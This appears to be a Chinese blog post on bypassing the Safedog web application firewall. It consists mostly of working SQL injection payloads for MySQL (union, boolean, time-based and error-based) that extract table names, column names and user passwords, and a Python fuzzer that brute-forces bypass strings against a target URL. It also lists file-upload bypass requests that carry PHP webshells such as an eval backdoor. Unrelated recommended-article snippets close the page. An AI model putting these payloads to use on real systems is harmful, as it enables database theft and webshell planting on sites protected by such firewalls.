1、SQL注入

手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性绕过

1、Mysql

1.1、联合注入

0x01 and绕过

直接 and 1=1 直接就会被拦截

在数值的前面加特殊符号干扰匹配规则进行绕过

在这里使用 取反符号'-'或者取逻辑位非运算符号'~'进行绕过

+图片

mysql> select ~1;
+----------------------+
| ~1 |
+----------------------+
| 18446744073709551614 |
+----------------------+
1 row in set (0.00 sec) mysql> select ~1=~1;
+-------+
| ~1=~1 |
+-------+
| 1 |
+-------+
1 row in set (0.00 sec) mysql> select ~1=~2;
+-------+
| ~1=~2 |
+-------+
| 0 |
+-------+
0x02 对order by ——> 判断表的字段数 进行绕过

通过破坏关键字测试出 拦截的是 order by 这两个关键字的组合,单独的关键字不拦 我们只需要干扰他的匹配即可

在这里我测试使用的是内联注释 和中间加特殊字符进行绕过

/*!order*/ by 3
order%0a%a0by 4

+图片

0x03 union select 联合注入进行绕过

这两个也是单独一个不拦 组合起来就会触发拦截

这里给出几个绕过payload

union select 绕过

'+union/*!44944select*/+1,2,3--+
'+union --+1%0aselect 1,2,3--+
'+union %23%0a+all+select+1,2,3--+
/*&id=-1'+union+select+1,2,3--+*/
'+"/*" union select 1,2,3 "*/"--+
'+'/*' union select 1,2,3 %23*/--+ user() 函数绕过 hex(user%0a())
hex(user/**/()) 爆表
union+/*!44944SELECT*/+1,2,GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%0a() 爆列
union+/*!44944SELECT*/+1,2,GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.columns+WHERE+TABLE_name=0x7573657273 爆数据
union+/*!44944SELECT*/+1,2,GROUP_CONCAT(username,0x7e,password+SEPARATOR+0x3c62723e)+FROM+users

1.2、盲注

1.2.1、延时注入

基础语句

select * from users where user_id=1 and if((substr((select user()),1,1)>10),sleep(5),1);

select user()处可以替换成要执行的查询语句
如:select group_concat(table_name,0x7e) from information_schema.tables where table_schema = database() payload 1、内联注释绕过 /*!11443and*/ if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1) 2、and后面可以接特殊的字符可以绕过包括不限于! ~ & - 加偶数个'~',可以绕过
加奇数个'-'可以绕过'
加 3 4 7 8 等数个'!'绕过 and ~if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1) and !!!if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1) and ---if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1)
mysql> select * from users where user_id = 1 and !1;
Empty set (0.00 sec) mysql> select * from users where user_id = 1 and !!1;
Empty set (0.00 sec) mysql> select * from users where user_id = 1 and !!!1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and !!!!1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and !!!!!1;
Empty set (0.00 sec) mysql> select * from users where user_id = 1 and ~1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and ~~~~~~~~~~~~~~~~~~~~~1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and -1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and --1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and ---1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)

1.2.2、布尔注入

基础语句

mysql> select * from users where user_id = 1 and substr((select user()),1,1)='r';
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec) mysql> select * from users where user_id = 1 and substr((select user()),1,1)='o';
Empty set (0.00 sec)
1、内联注释直接绕过

/*!11440and*/ substr((select hex(user/**/())),1,1)>1

2、在substr函数前面加特殊符号绕过

加偶数个'~',可以绕过
加 3 4 7 8 等数个'!'绕过 爆表
and+~~hex(substr((select table_name /*!11440from*/ information_schema.tables where table_schema=database/**/() limit 1,1),1,1))>71

1.3、报错注入

报错注入常用的一些函数
1、floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2、extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); 3、updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
mysql> select * from users where user_id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
mysql> select * from users where user_id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> select * from users where user_id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
绕过payload

1、内联注释绕过

/*!%26%26*/ /*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)

/*!11440and*/ /*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)

2、特殊连接符绕过

任意数个'~'符号绕过
奇数个'-'绕过
and-/*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1) and~/*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1) and `updatexml`(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)

fuzz script

import requests
from queue import Queue
import threading fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
fuzz_sz = ['', ' ']
fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
fuzz = fuzz_ch + fuzz_sz + fuzz_zs class Fuzz: def __init__(self, base_url, thread_num):
self.base_url = base_url
self.thread_num = thread_num
self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/74.0.3729.169 Safari/537.36'}
self.task = Queue()
for a in fuzz:
for b in fuzz:
for c in fuzz:
for d in fuzz:
exp = self.base_url + "'+\"/*\"union" + a + b + c + d + "select 1,2,3%23*/"
self.task.put(exp) def visit(self, exp_url):
try:
resp = requests.get(exp_url, headers=self.headers)
resp_text = resp.text
except requests.ConnectionError:
resp_text = ""
return resp_text def test_url(self):
with open('fuzz_url.txt', 'w+') as f:
while not self.task.empty():
exp_url = self.task.get()
resp_text = self.visit(exp_url)
if "Welcome" in resp_text and "error" not in resp_text:
f.write(exp_url + '\n')
print(exp_url) def work(self):
threads = []
for i in range(self.thread_num):
t = threading.Thread(target=self.test_url())
threads.append(t)
t.start()
for t in threads:
t.join() url = "http://192.168.121.11/sqlilabs/Less-1/?id=1" obj = Fuzz(url, 10)
obj.work()

2、上传绕过

2.1 上传绕过

1、换行绕过

Content-Disposition: form-data; name="upload_file"; filename="adm.p
hp"
Content-Type: image/jpeg <?php phpinfo();?>

2、00截断

Content-Disposition: form-data; name="upload_file"; filename="adm.php%00"  # %00进行URL编码
Content-Type: image/jpeg <?php phpinfo();?>

3、==绕过

Content-Disposition: form-data; name="upload_file"; filename=="adm.php"
Content-Type: image/jpeg <?php phpinfo();?>

4、form-data后添加大量个字符进行绕过

Content-Disposition: form-dataoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo;oooooooo name="upload_file"; filename="adm.php"
Content-Type: image/jpeg <?php phpinfo();?> 生成字符 with open('1.txt', 'w+') as f:
for i in range(411):
f.write('o')

5、文件名+'号绕过

Content-Disposition: form-data; name=upload_file; filename=ad'm.php
Content-Type: image/jpeg <?php @eval($_POST[1])?>

6、文件名加;号绕过

Content-Disposition: form-data; name="upload_file"; filename="adm;.php"
Content-Type:image/jpeg <?php include "adm.txt"; ?>

2.2 执行绕过

1、文件包含绕过

1.1、先上传个一句话txt格式的一句话

1.2、再传个脚本文件内容为包含前面传的文本文件

bypass_safedog的更多相关文章

随机推荐

  1. Java集合框架是什么?说出一些集合框架的优点?

    每种编程语言中都有集合,最初的Java版本包含几种集合类:Vector.Stack.HashTable和Array. 随着集合的广泛使用,Java1.2提出了囊括所有集合接口.实现和算法的集合框架.在 ...

  2. 属性.native用于解决第三方el组件库@click事件无效

    描述 有时发现用一些第三方的组件库时,例如一个封装好的button按钮<el-butten>,绑定点击事件却没有任何作用,这时便需要加 .native 原因: v-on 是对 Vue 的事 ...

  3. OpenCV常用基本处理函数(7)图像金字塔和直方图

    高斯金字塔 高斯金字塔的顶部是通过将底部图像中的连续的行和列去除得到的.顶部图像中的每个像素值等于下一层图像中 5 个像素的高斯加权平均值. 这样操作一次一个 MxN 的图像就变成了一个 M/2xN/ ...

  4. 【leetcode】915. Partition Array into Disjoint Intervals

    题目如下: 解题思路:题目要求的是在数组中找到一个下标最小的index,使得index左边(包括自己)子序列的最大值小于或者等于右边序列的最小值.那么我们可以先把数组从最左边开始到数组最右边所有子序列 ...

  5. VC++ 字符串操作学习总结

    vc++中各种字符串(转载) http://www.cnblogs.com/tomin/archive/2008/12/28/1364097.html CString ,BSTR ,LPCTSTR之间 ...

  6. %各位大佬的博客.tql

    线性基:https://www.cnblogs.com/ljh2000-jump/p/5869991.html#4219854 数位DP  https://blog.csdn.net/jk211766 ...

  7. [CSP-S模拟测试]:卡常题/b(基环树+DP)

    题目描述 $ρ$有一个二分连通无向图,$X$方点.$Y$方点均为$n$个(编号为$1\sim n$).这个二分图比较特殊,每一个$Y$方点的度为$2$,一条黑色边,一条白色边.所有黑色边权值均为$a$ ...

  8. 2018icpc南京/gym101981 I Magic Potion

    题意: 若干个勇士,每个勇士只能杀特定的怪物.每个勇士只能杀1个怪,但是有一些药,喝了药之后能再杀一个,每个勇士只能喝一瓶药.问你最多杀多少怪. 题解: 按照如下建图套网络流板即可. 网上有题解说套D ...

  9. HTML5: HTML5 拖放

    ylbtech-HTML5: HTML5 拖放 1.返回顶部 1. HTML5 拖放(Drag 和 Drop) 拖放(Drag 和 drop)是 HTML5 标准的组成部分.   将 RUNOOB.C ...

  10. Polysh实现多服务器批量执行shell

    安装 wget wget http://guichaz.free.fr/polysh/files/polysh-0.4.tar.gz tar -zxvf polysh-0.4.tar.gz cd po ...